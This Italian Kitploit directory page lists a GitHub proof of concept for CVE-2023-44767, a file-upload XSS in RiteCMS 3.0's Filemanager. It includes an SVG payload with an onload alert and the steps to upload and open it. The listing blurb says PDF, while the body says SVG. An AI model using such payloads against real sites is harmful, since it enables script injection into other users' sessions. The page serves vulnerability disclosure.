Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager — RiteCMS 3.0 è affetto da una vulnerabilità di File Upload - XSS che consente agli attaccanti di caricare un file PDF con uno XSS nascosto che, quando eseguito, avvierà il pop-up XSS. | Kitploit
Strumenti/GitHubGitHub/sromanhu/cve-2023-44767_ritecms-file-upload--xss---filemanager
Strumenti di PhishingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubsromanhu/cve-2023-44767_ritecms-file-upload--xss---filemanager

CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager

RiteCMS 3.0 è affetto da una vulnerabilità di File Upload - XSS che consente agli attaccanti di caricare un file PDF con uno XSS nascosto che, quando eseguito, avvierà il pop-up XSS.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
2 anni faNon ancora revisionato

RiteCMS 3.0 Caricamento file - XSS

Autore: (Sergio)

Descrizione: La vulnerabilità di caricamento file in RiteCMS 3.0 consente a un utente malintenzionato locale di caricare un file SVG con contenuto XSS.

Vettori di attacco: AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L


POC:

Creiamo un file SVG con il seguente contenuto:

root@kitploit:~
<svg
onload="alert('xss attach')"
 xmlns="http://www.w3.org/2000/svg">
</svg>

Quando accediamo al pannello, andiamo alla sezione "Filemanager" del menu Amministrazione e facciamo clic su Carica file.

File Upload XSS fichero subido

Qui vediamo il file SVG caricato correttamente:

File Upload XSS fichero subido 2

Quindi apriamo il file e appare il pop-up XSS.

File Upload XSS result


Informazioni aggiuntive:

https://github.com/handylulu/RiteCMS/

Scarica lo strumento